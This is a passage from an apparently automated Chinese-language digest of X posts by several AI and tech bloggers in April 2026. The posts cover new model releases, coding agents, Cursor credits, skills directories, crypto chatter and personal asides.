的好话就大几万播放,要是再加点黄仁勋彻底失败,美国AI走向灭亡,要是再懂点的,分析下中美能源对比,在喊一句华为取代英伟达成为全球霸主彻底改写世界AI格局,这视频直接奔着几十万播放去的。\n[原文链接](https://x.com/CuiMao/status/2049422304338444773)\n\n**[2026-04-29T07:55:14+00:00]**\n> Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!\n[原文链接](https://x.com/CuiMao/status/2049397079177592925)\n\n**[2026-04-29T07:44:33+00:00]**\n> x.com/i/article/204921670329…\n[原文链接](https://x.com/CuiMao/status/2049394392776290573)\n\n**[2026-04-29T07:09:24+00:00]**\n> 😄\n[原文链接](https://x.com/CuiMao/status/2049385544577438121)\n\n**[2026-04-29T07:02:18+00:00]**\n> 哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1\n[原文链接](https://x.com/CuiMao/status/2049383757535490257)\n\n**[2026-04-29T06:04:54+00:00]**\n> 呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。\n[原文链接](https://x.com/CuiMao/status/2049369313547800804)\n\n**[2026-04-28T18:44:13+00:00]**\n> 干爹发新模型了! 属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,\n[原文链接](https://x.com/CuiMao/status/2049198015232315465)\n\n**[2026-04-28T14:06:08+00:00]**\n> 50000🎉🎉\n[原文链接](https://x.com/CuiMao/status/2049128032661852434)\n\n**[2026-04-28T14:03:04+00:00]**\n> 如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。\n[原文链接](https://x.com/CuiMao/status/2049127261409034535)\n\n**[2026-04-28T13:35:22+00:00]**\n> R to @CuiMao: 支持json格式的日志导出!很重要\n[原文链接](https://x.com/CuiMao/status/2049120290949702063)\n\n**[2026-04-28T13:29:32+00:00]**\n> 因为要做benchmark,所以用claude做了个win原生的显卡监控,市面上的都过度设计给游戏用的花里胡哨。这个版本算跑起来了,下个一版本支持本地多卡监控。\n[原文链接](https://x.com/CuiMao/status/2049118822070997394)\n\n**[2026-04-28T12:11:57+00:00]**\n> 麻烦下次这种表单不要at我,我就是个傻逼,我不配。谢谢。\n[原文链接](https://x.com/CuiMao/status/2049099295337709885)\n\n**[2026-04-28T10:30:47+00:00]**\n> 😅😅玩游戏顶着 CuiMao 的 ID 被队友认出来了。\n[原文链接](https://x.com/CuiMao/status/2049073837543940468)\n\n**[2026-04-28T07:47:59+00:00]**\n> 听我一句劝,不要接触 .NET。 不要什么都想学,不要觉得 AI 牛逼了,自己就也牛逼起来了。 有些技术不是用来学习的,是用来渡劫的。 不要接触 .NET,人生会变得不幸。\n[原文链接](https://x.com/CuiMao/status/2049032868610072772)\n\n**[2026-04-28T07:35:15+00:00]**\n> 昨天试了下快乐🐎,早上起来一看欠费了, 我是韭菜我自豪。😎😎😎\n[原文链接](https://x.com/CuiMao/status/2049029664639979624)\n\n**[2026-04-27T15:28:57+00:00]**\n> 我不说你们自己看 同一套提示词 happyhorse和seedance2 赛博商K以后可以当视频模型的基准测试了\n[原文链接](https://x.com/CuiMao/status/2048786486435492337)\n\n**[2026-04-27T12:36:02+00:00]**\n> 未收货,仅退款,\n[原文链接](https://x.com/CuiMao/status/2048742972020470168)\n\n**[2026-04-27T12:21:31+00:00]**\n> R to @CuiMao: @grok 你说说呢\n[原文链接](https://x.com/CuiMao/status/2048739316969648376)\n\n**[2026-04-27T12:10:00+00:00]**\n> 一喝梅酒就浑身刺挠,,我这是过敏吗?\n[原文链接](https://x.com/CuiMao/status/2048736420198842831)\n\n---\n\n### ✅ @0xAA_Science — 0xAA(14 条)\n\n**[2026-04-28T10:24:33+00:00]**\n> 央视报道了 “渔猎齐哥” Up主,真牛逼啊。 监督环境保护,吾辈义不容辞!\n[原文链接](https://x.com/0xAA_Science/status/2049072268165497033)\n\n**[2026-04-28T05:40:29+00:00]**\n> 青椒肉丝饭 + 老盐百香果 6u\n[原文链接](https://x.com/0xAA_Science/status/2049000780519321906)\n\n**[2026-04-28T03:52:33+00:00]**\n> 快连被墙干服了,关停了中国大陆的服务。 我没用过快联,不过这几天群里都是说快连用不了的,感觉用户很多。 有什么好的 vpn 推荐吗?我其实觉得买个海外服务器,让 AI 帮你自建一个 VPN 更靠谱。\n[原文链接](https://x.com/0xAA_Science/status/2048973617854328890)\n\n**[2026-04-27T08:47:12+00:00]**\n> Meta 对 Manus 的收购被中国发改委驳回。 看来以后要么一开始就出海,要么就不出海。\n[原文链接](https://x.com/0xAA_Science/status/2048685380304871774)\n\n**[2026-04-27T07:30:32+00:00]**\n> RT by @0xAA_Science: 用 @gmgnai 的 skill (获取链上数据) + @xapi_to xapi skill(社交搜索)组合玩玩,做了个异动的meme(异动的老币+新币+多链异动同名币+持续上升币),担心再次错过太空狗等信号~ 有 ai 真方便啊~\n[原文链接](https://x.com/0xAA_Science/status/2048666088733581805)\n\n**[2026-04-27T03:49:07+00:00]**\n> 狗B们在组团在 bags 分流太空狗,好恶心啊。 下次它们买什么,咱们就去找个新盘子分,好吗?\n[原文链接](https://x.com/0xAA_Science/status/2048610365324623966)\n\n**[2026-04-26T07:01:25+00:00]**\n> 给 auth2api 加了对 openai/codex 账号的授权支持,等审核完成就会合并。 另外最近 xAPI 也在探索 AI 中转业务,有中转站和号商资源的可以联系我,我建个AI中转交流群,方便大家沟通。 https://github.com/AmazingAng/auth2api\n[原文链接](https://x.com/0xAA_Science/status/2048296373569941533)\n\n**[2026-04-26T04:15:19+00:00]**\n> 感觉 gpt 5.5 的 plan 能力比 opus 4.7 要强。 opus 总是吭哧吭哧搞个很复杂的方案,gpt 给的plan 更简单并能达到同样效果。\n[原文链接](https://x.com/0xAA_Science/status/2048254571622113742)\n\n**[2026-04-26T02:36:56+00:00]**\n> 川普的命真是硬啊,在白宫记者晚宴遭遇枪击,结果又平安无事! 枪手 Cole Allen,来自加州,曾经被评为月度最佳教师。\n[原文链接](https://x.com/0xAA_Science/status/2048229814172275062)\n\n**[2026-04-25T04:05:21+00:00]**\n> 卧槽,收到 Cursor 送的 10,000u AI 额度! 昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了! 这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai\n[原文链接](https://x.com/0xAA_Science/status/2047889676867080420)\n\n**[2026-04-23T10:13:27+00:00]**\n> R to @0xAA_Science: 已经修复了\n[原文链接](https://x.com/0xAA_Science/status/2047257535598706937)\n\n**[2026-04-23T09:47:01+00:00]**\n> 群友反应币安钱包看不到资产,我确认了下,的确显示异常。 但是区块浏览器能看到资金,说明不是被盗,应该是币安钱包的节点/数据服务出了问题,资产安全,大家不要担心! @BinanceWallet @heyibinance @cz_binance\n[原文链接](https://x.com/0xAA_Science/status/2047250882287526158)\n\n**[2026-04-23T07:55:58+00:00]**\n> 下次香港开会可以约个休闲篮球局? 🏀\n[原文链接](https://x.com/0xAA_Science/status/2047222936923525438)\n\n**[2026-04-22T13:08:23+00:00]**\n> 最近看到一个 AI x 预测市场的项目,UniPat AI @UniPat_AI ,把预测做成了可对比、可验证的一套系统。 我找创始人聊了下: 1. 预测市场很火,但是能用 AI 精准预测的项目很少,而他们在这一方面走在了前面。 2. 目前框架已经搭好,并且推出了 Echo 模型,目前在 benchmark 上排第一,和真实市场对比也有优势(对标 Polymarket 胜率 63.2%)。 3.…\n[原文链接](https://x.com/0xAA_Science/status/2046939173710676227)\n\n---\n\n### ✅ @dingyi — Ding(20 条)\n\n**[2026-04-29T09:38:53+00:00]**\n> 这个动效设计 skills 真好! npx skills add jakubantalik/transitions-dev\n[原文链接](https://x.com/dingyi/status/2049423162933395583)\n\n**[2026-04-29T03:49:14+00:00]**\n> 我就知道🤣🤣🤣\n[原文链接](https://x.com/dingyi/status/2049335171066061234)\n\n**[2026-04-29T01:47:21+00:00]**\n> Ghostty 离开 GitHub,同一天 Warp 宣布开源。 Warp 一直以来都很好用,但越来越臃肿,性能也差点意思,但对不会命令行的非程序员非常友好,这次开源可以说是一个重大转折点,没准半年后各种 Warp 变体都会出现了。 还有,Warp 现在的垂直 tab 就比基于 Ghostty 的那些 Cmux 好用多了,期待未来出现更多好用的终端!\n[原文链接](https://x.com/dingyi/status/2049304499093946475)\n\n**[2026-04-28T22:59:18+00:00]**\n> 我去有人知道这是哪位大神设计的吗?@FateTell 应该是今年看到的设计最精美又好玩的 iOS app 了 !算命 + AI 结合很有创意,细节打磨的也相当好。哪怕你对八字之前不感兴趣,我也建议下载一个把玩一下。看多了千篇一律 vibe 的产品,突然看到这个真的让人眼前一亮啊。 https://fatetell.com/zh-CN/invite?referral=QQE5QT\n[原文链接](https://x.com/dingyi/status/2049262208241332358)\n\n**[2026-04-28T16:58:50+00:00]**\n> So good!\n[原文链接](https://x.com/dingyi/status/2049171494329065493)\n\n**[2026-04-28T16:40:15+00:00]**\n> 最喜欢的硅谷科技公司之一 Poolside 发布模型了!他们的网站设计简直是艺术品。 https://poolside.ai/\n[原文链接](https://x.com/dingyi/status/2049166818452160778)\n\n**[2026-04-28T15:07:51+00:00]**\n> 周末刚说完 Cursor 很聪明,小米马上就学会了。免费给一个月会员,也没几个钱,不管谁申请都秒过,相当于请所有网友免费宣传,万一还有不少人忘了关掉自动续费,反而还赚了🤣 我感觉以后所有模型厂商都学会这招了,再也没有他们的商单了。。。\n[原文链接](https://x.com/dingyi/status/2049143565260042558)\n\n**[2026-04-28T11:59:03+00:00]**\n> 之前买过 ZenMux 速度还是挺快的, 算是 OpenRouter alternative 吧。咱也不是很懂,感觉既然能上 OpenCode 的第三方列表,说明还是比较正规和靠谱的吧? 目前 DeepSeek V4 限时免费体验:https://zenmux.ai/invite/RUR17S\n[原文链接](https://x.com/dingyi/status/2049096050158551248)\n\n**[2026-04-28T09:01:04+00:00]**\n> 国内银行大概是永远也不会有这种工具了。 https://rayfinance.app/\n[原文链接](https://x.com/dingyi/status/2049051261295878623)\n\n**[2026-04-28T04:19:58+00:00]**\n> 绝了哈哈哈哈,卖铲子给卖铲子的人。。。其实就是用 new-api 一键部署一个,竟然卖这么贵。我觉得我也可以这么搞🤣\n[原文链接](https://x.com/dingyi/status/2048980519019528349)\n\n**[2026-04-28T03:26:53+00:00]**\n> 已申请!邀请你参加 Xiaomi MiMo Orbit 百万亿 Token 创造者激励计划,100T Credits 面向全球用户限时发放中... https://100t.xiaomimimo.com/\n[原文链接](https://x.com/dingyi/status/2048967160287072576)\n\n**[2026-04-28T02:14:39+00:00]**\n> 小扎当年在天安门跑步,跪舔了半天也没得到国家的好处,这次国家算是还了人情。半年后再看,谁还要收购这么个破玩意,小扎做梦都要笑醒了。 创始团队也没啥损失,再搞一个项目很快就会拿到风投估值上亿。\n[原文链接](https://x.com/dingyi/status/2048948980655292914)\n\n**[2026-04-27T13:45:23+00:00]**\n> 把 new-api 的 UI 用 Hero UI 重构了一遍。之前他们用的那个抖音的 semi 设计系统太垃圾了。\n[原文链接](https://x.com/dingyi/status/2048760423491764431)\n\n**[2026-04-27T09:47:04+00:00]**\n> 以后有好东西是真不能说出去,大家都知道了很快就没了。。。DMIT 美区 Premium 竟然所有套餐都卖光了,前两天还全都有呢。\n[原文链接](https://x.com/dingyi/status/2048700446425165890)\n\n**[2026-04-27T02:37:06+00:00]**\n> 刚发现私信里好多人问:怎么搞 cursor,哪里申请。 还有人更直接:账号密码发过来,给我用用。。。 我。。。。。。\n[原文链接](https://x.com/dingyi/status/2048592243754504229)\n\n**[2026-04-27T02:09:47+00:00]**\n> 每天刷 timeline: 外国人都是认真分享自己的作品、产品、生活。 中国人都是:注册美国公司、买海外 sim 卡、薅羊毛、吵架撕逼……\n[原文链接](https://x.com/dingyi/status/2048585369315316105)\n\n**[2026-04-26T22:57:15+00:00]**\n> A small library of quiet loaders. https://icons.icantcode.fyi/\n[原文链接](https://x.com/dingyi/status/2048536915222376906)\n\n**[2026-04-26T14:59:04+00:00]**\n> Pinned: Been testing NanoClaw for a few days, hooked it up to OpenRouter's free inclusionai/ling-2.6-1t:free model. The speed is absolutely wild. NanoClaw is already lightweight and snappy. Add @AntL…\n[原文链接](https://x.com/dingyi/status/2048416578396655905)\n\n**[2026-04-26T13:01:07+00:00]**\n> So DESIGN.md files are basically Tailwind base CSS files? https://designdotmd.directory/\n[原文链接](https://x.com/dingyi/status/2048386895995191344)\n\n**[2026-04-26T07:51:39+00:00]**\n> 都快猝死了烧了两天才 $695,靠 human in the loop 一个月肯定是烧不完 $10000 的。 突然发现他们的 Cloud agents 很好用,云端就不会因为本地机器的性能问题卡住了,还能执行自动化。再加上这个 multitask,应该可以在一个月内花光 token 了。\n[原文链接](https://x.com/dingyi/status/2048309013675216966)\n\n---\n\n### ✅ @GoSailGlobal — Jason Zhu(19 条)\n\n**[2026-04-29T09:07:13+00:00]**\n> 做了 2 个月的事:把 GitHub 上每一个 Claude Skill / MCP server / 开源 Agent 工具都索引下来 数据库现在 67,196 个项目 跑了一遍分布分析,结果让我自己愣了 30 秒: - 基尼系数 0.983(破 AppStore、npm、YouTube 纪录) - 54.1% 的项目是 0 star——不是「少 star」,是 0 - Top 1% 占走了 …\n[原文链接](https://x.com/GoSailGlobal/status/2049415194372342164)\n\n**[2026-04-29T08:40:25+00:00]**\n> R to @GoSailGlobal: 3️⃣ 可以把做的张小龙Agent拉到群组 大家可以圆桌讨论,简单易用\n[原文链接](https://x.com/GoSailGlobal/status/2049408452079046944)\n\n**[2026-04-29T08:40:22+00:00]**\n> R to @GoSailGlobal: 2️⃣ 每个agent可以GUI自定义大模型、skill、memory 还可以支持第三方模型\n[原文链接](https://x.com/GoSailGlobal/status/2049408436597899361)\n\n**[2026-04-29T08:40:18+00:00]**\n> R to @GoSailGlobal: 1️⃣ 使用google邮箱登陆 可下载本地软件(最好下载本地) or 网页版使用\n[原文链接](https://x.com/GoSailGlobal/status/2049408421167005763)\n\n**[2026-04-29T08:40:14+00:00]**\n> 被一个二维码拉进了一个 IM 内测群 群里坐着 Codex / Claude Code 实例、张小龙 agent,再加几个真人,大家一起讨论选题 agent 先梳调性,再列大纲,真人在旁边补刀 我做 AgentSkillsHub 看了 67,000+ 个 agent 项目,第一次见有人把 agent 当 IM 里的「一等公民」:不是 bot、不是插件,是好友名单里的成员 它叫 Bloome(ht…\n[原文链接](https://x.com/GoSailGlobal/status/2049408403240571320)\n\n**[2026-04-29T05:32:52+00:00]**\n> 拼接两段 15s的忠犬八公动漫视频 很不错哈\n[原文链接](https://x.com/GoSailGlobal/status/2049361252804427850)\n\n**[2026-04-29T04:07:44+00:00]**\n> Matt Pocock 的 Skill 框架 · 跟其他三家的差异 项目链接:http://github.com/mattpocock/skills · 38K stars · MIT · 单人维护、日活更新 一句话:把资深工程师的纪律装进 Claude Code,让 vibe coder 也能写出能上线的代码。 含 16 个 skill:tdd / diagnose / improve-cod…\n[原文链接](https://x.com/GoSailGlobal/status/2049339826877665496)\n\n**[2026-04-29T03:53:48+00:00]**\n> x.com/i/article/204933030407…\n[原文链接](https://x.com/GoSailGlobal/status/2049336319286063302)\n\n**[2026-04-29T03:20:42+00:00]**\n> 4/29 AI 圈速览 • OpenAI 全系正式登陆 AWS:GPT + Codex + 托管 Agent 一并上线 • Anthropic 拒接军方合作,Google 顺势签下五角大楼新合同 • Claude Code 系统提示 Bug:托管 Agent 失效 + 用户 token 被空转烧光 • mattpocock 开源个人 .claude Skills 目录:工程师级实战合集 • Co…\n[原文链接](https://x.com/GoSailGlobal/status/2049327989951967546)\n\n**[2026-04-29T03:20:09+00:00]**\n> 🔥 今日新鲜 Skills 精选 Top 10(4月29日) 由 http://agentskillshub.top 整理!发现 67000+ AI Agent 工具,每日更新 🚀 Mozilla 出手做统一 LLM 接口 + 跨领域 MCP 扩张,今日生态边界被拓得最宽!!! 1️⃣ mozilla-ai/any-llm ⭐ 1928 | +1928 Mozilla AI 出品——一个接口跟所…\n[原文链接](https://x.com/GoSailGlobal/status/2049327853469310984)\n\n**[2026-04-29T01:58:03+00:00]**\n> 说个冷知识 云服务厂商还是很有投资眼光的 原价或者加价买了H100,现在还能卖那个价,甚至更高 另外他还能出租5年保修期内的机器 这不妥妥当下最具价值的投资品类嘛\n[原文链接](https://x.com/GoSailGlobal/status/2049307192692781200)\n\n**[2026-04-29T01:22:14+00:00]**\n> RT by @GoSailGlobal: 我和张凯的GEO论文,在全球最大的论文平台http://arxiv.org完成审核并正式发布 这应该是全球第二篇与GEO有关的专项论文 论文基于今年3月份最新的数据,包括602条 Prompt、21143 条引用、23745条AI抓取记录,最终形成的一版正式的GEO专项研究报告,欢迎查阅 如果对大家能有帮助,我们打算后面继续抓取更多的数据,进行专项研究并…\n[原文链接](https://x.com/GoSailGlobal/status/2049298176935690588)\n\n**[2026-04-28T16:03:58+00:00]**\n> 当我听说AI博主赚钱,我去做了,发现也不是那样 当我听说知识付费赚钱,我也去做了,发现也不是很赚钱 当我听说线下开课挺赚钱的,中午吃饭被点醒了,我应该去做啥\n[原文链接](https://x.com/GoSailGlobal/status/2049157687766663643)\n\n**[2026-04-28T15:46:21+00:00]**\n> 那我也得查下拉 英国公司 Mark\n[原文链接](https://x.com/GoSailGlobal/status/2049153253464490431)\n\n**[2026-04-28T13:05:22+00:00]**\n> 账号代运营这个事,我只在微信聊天里说过 且没有外传 为什么豆包能知道?微信南山必胜客,可以查查哈\n[原文链接](https://x.com/GoSailGlobal/status/2049112739696513306)\n\n**[2026-04-28T12:54:18+00:00]**\n> RT by @GoSailGlobal: x.com/i/article/204910523511…\n[原文链接](https://x.com/GoSailGlobal/status/2049109953668149643)\n\n**[2026-04-28T12:08:55+00:00]**\n> R to @GoSailGlobal: 我跟前同事说了下我的业务,然后他去问了下豆包\n[原文链接](https://x.com/GoSailGlobal/status/2049098535459553712)\n\n**[2026-04-28T12:08:22+00:00]**\n> 兄弟们,我真没做豆包GEO 你把我收入都曝光了 还曝光了我名字,给我增加了一些没有的业务🤣\n[原文链接](https://x.com/GoSailGlobal/status/2049098393448812767)\n\n**[2026-04-28T09:43:09+00:00]**\n> 来盛大逛了逛 见了推友艾略特@elliotchen100 @evermind 原来他们集团旗下,好多个AI Native团队 拿了一波周边👀\n[原文链接](https://x.com/GoSailGlobal/status/2049061850621296924)\n\n---\n\n### ✅ @frxiaobei — 凡人小北(15 条)\n\n**[2026-04-28T16:56:00+00:00]**\n> 我现在基本不太直接用 Agent了。 介绍下我的AI 搭档,Finn。 现在大部分情况是 Finn 让 Agent 去干活。 工作流其实挺简单的: 我现在会现在 Codex (之前是 Claude Code) 里把一个 Agent 或者 skill 调好,跑到稳定。 然后直接丢给 OpenClaw,后面基本就不太管了 这一步挺关键的。 不然你会发现一个很烦的事情: 你要跟一堆 Agent 来回对…\n[原文链接](https://x.com/frxiaobei/status/2049170782170042513)\n\n**[2026-04-28T16:07:28+00:00]**\n> 现在远程面试可以更干脆了。 面试官当甲方出需求, 应聘者打开 Codex / Claude Code, 直接共享屏幕开始干。 半小时什么都看清了。\n[原文链接](https://x.com/frxiaobei/status/2049158565487935850)\n\n**[2026-04-28T15:53:41+00:00]**\n> 雷老板是懂营销的, 本着拿人 token,替人带货的原则, 替 Xiaomi MiMo 喊个话。\n[原文链接](https://x.com/frxiaobei/status/2049155099071750164)\n\n**[2026-04-28T13:41:13+00:00]**\n> 图像类产品现在分两派: 把单次生成做到极致,和把整个视觉工作流跑通。 flowith 明显是后者,还顺手把视频给 seedance 出来了。 关键是底层就是 image2,而且不止这一个模型。 不管底层怎么换,上层工作流都很稳。 单点极致 + 工作流闭环,两派合一。 对我这种普通用户非常有价值。\n[原文链接](https://x.com/frxiaobei/status/2049121762009632774)\n\n**[2026-04-28T05:05:35+00:00]**\n> Claude Code 最近放飞得厉害,“Let 我”是哪国语言,是被 chinglish 污染了吧。\n[原文链接](https://x.com/frxiaobei/status/2048991998275965022)\n\n**[2026-04-27T16:45:39+00:00]**\n> RT by @frxiaobei: A completely local agent that lives right inside your browser. Powered by Gemma 4 E2B and WebGPU, it uses native tool calling to: 🔍 Search browsing history 📄 Read and summarize page…\n[原文链接](https://x.com/frxiaobei/status/2048805789788413984)\n\n**[2026-04-27T16:44:03+00:00]**\n> Amazing\n[原文链接](https://x.com/frxiaobei/status/2048805385537306677)\n\n**[2026-04-27T16:32:39+00:00]**\n> OpenClaw 4.1x 后对于 GPT 的支持上了一个大台阶,之前只说不干的毛病基本没了。 但是我修改了点 soul 文件里的内容后,他现在讲话总“卧槽”是怎么回事儿。 像极了刚走向社会的二愣子。\n[原文链接](https://x.com/frxiaobei/status/2048802517237350599)\n\n**[2026-04-27T16:24:39+00:00]**\n> OpenClaw 这么频繁的发版,我一开始以为他们掌握了什么自动化测试的黑科技,直到我最近做了两次升级。 😤 虽然 AI 时代讲究一个快,但好歹咱尊重下测试环节。\n[原文链接](https://x.com/frxiaobei/status/2048800504206282887)\n\n**[2026-04-26T19:41:23+00:00]**\n> RT by @frxiaobei: Yes, Obsidian Reader works for X articles and threads using the browser extension. We're also making improvements to the share sheet in Obsidian 1.13 so you'll be able to save more …\n[原文链接](https://x.com/frxiaobei/status/2048487623250063516)\n\n**[2026-04-26T11:39:25+00:00]**\n> RT by @frxiaobei: 1:我做了一张「项目」图 汇报用的 PPT 图之类的! 2:但是甲方需要 4K 图。或者 PSD 图层! 3:于是我试着在 GPT 里面让它给我 做PSD 分层文件。 MD 居然给我做了!改给了我一个分层压缩包! 4:里面的图片居然是 4K 尺寸的! 5:所以我们能通过这个方法获得 GPT 的 4K 图片!\n[原文链接](https://x.com/frxiaobei/status/2048366332639674706)\n\n**[2026-04-26T11:00:35+00:00]**\n> Claude Design 虽好,但是额度不够用啊😮‍💨\n[原文链接](https://x.com/frxiaobei/status/2048356561131905177)\n\n**[2026-04-26T08:35:15+00:00]**\n> RT by @frxiaobei: 一次体检,算不上全量啊。多次体检,基因组,衰老时钟,CGM,可穿戴,得全整起来给AI。直接看看这个 https://orviva.ai, Health memory for AI\n[原文链接](https://x.com/frxiaobei/status/2048319988826820941)\n\n**[2026-04-26T06:14:58+00:00]**\n> 每次刷到这张图都悲从中来。\n[原文链接](https://x.com/frxiaobei/status/2048284683767812133)\n\n**[2026-04-26T05:58:41+00:00]**\n> 早上去爱康国宾做了个年度体检,往年都会直接丢给 chatgpt,今年直接小程序内用了爱康家的 ikkie 健康管家。 虽然做的一言难尽,但医疗 AI 这条线很明显出现了一些底层的变化。 以前那套拿着报告去问 ChatGPT 的玩法有个隐含的前提,问题是我自己定义的。 现在逻辑完全反转, AI 拿到我的全量数据,然后反推出应该关心什么。 在这个形态下我就转变成一个被持续监控和解释的对象。这听起来有…\n[原文链接](https://x.com/frxiaobei/status/2048280586318672269)\n\n---\n\n### ✅ @gkxspace — 余温(18 条)\n\n**[2026-04-29T03:09:17+00:00]**\n> 有做 摄影行业 的朋友吗,有个项目想聊一聊😊\n[原文链接](https://x.com/gkxspace/status/2049325117998592311)\n\n**[2026-04-29T01:38:07+00:00]**\n> R to @gkxspace: 大家的重点不应该放在“六个月”、“不需要人” 技术的迭代速度很快,现在可以10个人变成5个,或许六个月、也或许一年后可能变成1个,直到完全不需要人来做各种重复性工作 更应该关注的是找到自身的价值,在这波AI浪潮里有属于自己的独特性\n[原文链接](https://x.com/gkxspace/status/2049302176900501544)\n\n**[2026-04-28T14:39:43+00:00]**\n> 刚看了郭宇的访谈,提到六个月之后或许就不需要人再工作了,知识工作者应该享受这仅有的六个月。 我并不觉得这是危言耸听,因为按照目前这个阶段,整个发展其实不难看出来。 Claude Code、Skills、OpenClaw,不都在向全自动化发展。 如果再有一次大的模型迭代,下一个颠覆性的产品出现,或许知识工作者的工作真的能完全被 AI 取代。 现在 AI Coding 的能力已经非常非常强了,你做出…\n[原文链接](https://x.com/gkxspace/status/2049136483106230523)\n\n**[2026-04-28T11:08:05+00:00]**\n> 这个 Codex 教程很不错,新手值得一看。 作者一个人演示并行推进 6 个项目:iOS App、React 落地页、Remotion 视频、投资人 Deck、移动端设计稿、Twitter 自动发帖。 5 个有用的技巧: ①Codex 是一个 AI 代理调度中心:编码、文档、浏览器、计算机控制全在一个界面里。你可以同时给多个 AI 代理下指令。 ②插件是别人给你的能力,skills是你自己造的能…\n[原文链接](https://x.com/gkxspace/status/2049083226463797284)\n\n**[2026-04-28T10:26:08+00:00]**\n> 我的 mac 的工作区,这几个都是必不可缺,看来大家差不多,还有没安装的快装一下: 1. Obsidian:用来做内容存档、搭建个人知识库 2. cc-swtich:管理多个 CLI 工具,管理多家模型供应商 3. Codex :最近更新很频繁,体验也越来越好,而且不封号 4. Ghostty:一个非常丝滑的终端,推荐~ 5. 闪电说 + Typless:前者非结构化,后者结构化,配合使用很爽 …\n[原文链接](https://x.com/gkxspace/status/2049072666385006919)\n\n**[2026-04-26T14:41:16+00:00]**\n> 牛逼,卡神又出教程了 4美分/天、KiteSim香港卡,免实名+独享虚拟号 马上跟着教程申请一张!!!\n[原文链接](https://x.com/gkxspace/status/2048412096665145411)\n\n**[2026-04-25T16:04:44+00:00]**\n> R to @gkxspace: agent.creao.ai/signup?ref=Ws…\n[原文链接](https://x.com/gkxspace/status/2048070713601376712)\n\n**[2026-04-25T13:45:29+00:00]**\n> R to @gkxspace: x.com/gkxspace/status/204803…\n[原文链接](https://x.com/gkxspace/status/2048035672078844248)\n\n**[2026-04-25T13:44:55+00:00]**\n> 用 CREAO AI 一句话直接做出来的一个电商智能体,这个效果有点太离谱了。 简直就是小白福音,还内嵌了平常会用到的各种API,不用折腾各种API KEY,支持云端一键部署,太强了。 我的提示词: 我需要一个智能体实现:电商新品从0到上架 选品→找供应商→写详情页→生产品图→定价→广告文案,全套\n[原文链接](https://x.com/gkxspace/status/2048035527459319854)\n\n**[2026-04-25T13:32:58+00:00]**\n> 生财有术、得到新商学,哪个更好一些 最近都在折扣阶段,生财2765、得到2888,还没进过这种大的社群,尝试一下 你会选生财、得到、生财+得到都要,或者还有更好的推荐吗🤔\n[原文链接](https://x.com/gkxspace/status/2048032521942626343)\n\n**[2026-04-25T06:15:53+00:00]**\n> 去了趟书店,被震惊了,到底谁在买这些书啊😅\n[原文链接](https://x.com/gkxspace/status/2047922526685155786)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @gkxspace: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/204773843982373309…\n[原文链接](https://x.com/gkxspace/status/2047891848908472433)\n\n**[2026-04-24T11:36:13+00:00]**\n> 兄弟们,这个邀请码太难搞了 我找官方要了一些,大家给 OpenClaw/Hermes Agent 配置一个免费的AI邮箱 ClawEmail :https://claw.163.com/?channel=gkxspace 邀请码:CLAW0799450B9EF5 可以使用两百次,大家快配置一下\n[原文链接](https://x.com/gkxspace/status/2047640751774060771)\n\n**[2026-04-24T01:54:50+00:00]**\n> 歸藏大佬的 PPT SKill 终于来了,审美依旧没对手,可以吧之前的 PPT SKill 换掉了 配合刚出的 GPT5.5 和 新版 Codex,简直无敌 https://github.com/op7418/guizang-ppt-skill\n[原文链接](https://x.com/gkxspace/status/2047494444857913663)\n\n**[2026-04-23T12:32:29+00:00]**\n> R to @gkxspace: https://claw.163.com/?channel=gkxspace 现在可以报名内测,通过这个可以很快通过\n[原文链接](https://x.com/gkxspace/status/2047292526759931980)\n\n**[2026-04-23T12:28:41+00:00]**\n> x.com/i/article/204728945783…\n[原文链接](https://x.com/gkxspace/status/2047291569565303239)\n\n**[2026-04-22T13:06:00+00:00]**\n> 用了两天志辉大佬开源的 skills-manage,好家伙,这个工具解决了我一个大痛点。 以前我的 Skill 文件散落在各种地方,每次更新一个 Skill,得手动同步。 skills-manage 用 ~/.agents/skills/ 做中央仓库,其他平台通过软链接指向这里。一处修改,全平台生效。 并且: 1. 可以从 GitHub 直接导入 Skill 仓库 2. 支持 20+ 个 AI …\n[原文链接](https://x.com/gkxspace/status/2046938571395760307)\n\n**[2026-04-22T11:34:21+00:00]**\n> x.com/i/article/204660489877…\n[原文链接](https://x.com/gkxspace/status/2046915506523783421)\n\n---\n\n### ✅ @Stv_Lynn — Steven Lynn(13 条)\n\n**[2026-04-27T10:37:36+00:00]**\n> Image\n[原文链接](https://x.com/Stv_Lynn/status/2048713165232644251)\n\n**[2026-04-25T18:40:34+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/quote-bud…\n[原文链接](https://x.com/Stv_Lynn/status/2048109932751560818)\n\n**[2026-04-25T18:40:33+00:00]**\n> R to @Stv_Lynn: 3. 逆向了 Quote 的官方固件,成功实现了 USB 写入图像\n[原文链接](https://x.com/Stv_Lynn/status/2048109929203212615)\n\n**[2026-04-25T18:40:32+00:00]**\n> R to @Stv_Lynn: github.com/stvlynn/Stakka\n[原文链接](https://x.com/Stv_Lynn/status/2048109925612851296)\n\n**[2026-04-25T18:40:32+00:00]**\n> R to @Stv_Lynn: 2. 继续 push 一下 stekka 之前没有做过移动端,很大一部分原因是 sonnet-3.5 时代还没法稳定生成 swift,一直在用 react native 做一些简单小应用 现在发现主流 SOTA 模型已经能很稳定地产出 swift 了 自动化测试也通过 AXE 